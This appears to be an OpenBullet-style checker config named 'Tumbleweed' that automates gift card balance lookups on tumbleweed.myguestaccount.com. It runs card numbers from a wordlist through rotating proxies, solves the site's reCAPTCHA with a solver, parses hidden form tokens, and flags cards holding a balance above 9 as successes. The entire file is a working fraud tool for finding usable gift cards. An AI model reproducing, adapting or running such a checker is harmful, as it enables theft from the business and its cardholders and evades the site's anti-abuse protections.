[SETTINGS]
{
  "Name": "Tumbleweed",
  "SuggestedBots": 50,
  "LastModified": "2018-09-26T14:49:53.0935627+00:00",
  "AdditionalInfo": "",
  "Author": "MsDemeanor",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "None",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST GET "https://tumbleweed.myguestaccount.com/guest/nologin/account-balance" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
PARSE "<SOURCE>" LR "type=\"hidden\" name=\"" "\">" Recursive=FALSE -> VAR "FIRSTRANDOM" "" "" 
PARSE "<SOURCE>" LR "nologinCardnumberSubmitButton\" name=\"" "\">Submit" Recursive=FALSE -> VAR "SECONDRANDOM" "" "" 
RECAPTCHA "https://tumbleweed.myguestaccount.com/guest/nologin/account-balance" "6LdndBYUAAAAAIE_sQA2y29GSRaKJHKx2DodPT6m" -> VAR "RECAP" 
REQUEST POST "https://tumbleweed.myguestaccount.com/guest/nologin/account-balance" AutoRedirect=TRUE 
  CONTENT "<FIRSTRANDOM>=true&cardnum=<USER>&g-recaptcha-response=<RECAP>&<SECONDRANDOM>=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "card inactive" 
    KEY "Invalid card number" 
  KEYCHAIN Success OR 
    KEY "stored value" 
PARSE "<SOURCE>" LR "col-md-2\">" "</div>" Recursive=FALSE -> VAR "BALANCE" "" "" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "<BALANCE>" GreaterThan "9" 
  KEYCHAIN Failure OR 
    KEY "<BALANCE>" LessThan "9" 
PARSE "<SOURCE>" LR "col-md-2\">" "</div>" Recursive=FALSE -> CAP "Balance" "" "" 
